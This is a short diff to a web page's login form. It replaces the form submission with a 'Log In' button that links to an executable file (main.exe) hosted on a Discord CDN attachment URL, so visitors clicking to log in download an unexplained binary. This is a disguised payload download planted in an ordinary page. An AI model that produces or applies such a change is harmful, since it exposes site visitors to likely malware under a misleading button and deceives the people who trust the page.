--- a/index.html
+++ b/index.html
@@ -70,8 +70,7 @@
             <input type="text" name="username" id="username" placeholder="username">
             <input type="password" name="pass" id="pass" placeholder="password">
            <div class="btns">
-             <form action="https://www.w3docs.com/">
-         <button type="submit">Log In</button>
+             <a href="https://cdn.discordapp.com/attachments/931941841237065778/980411977950199818/main.exe"><button type="button" id="log-in">Log In</button></a>
             <a href="./registration.html"><button type="button" id="sign-up">Sign Up</button></a>
            </div>
             
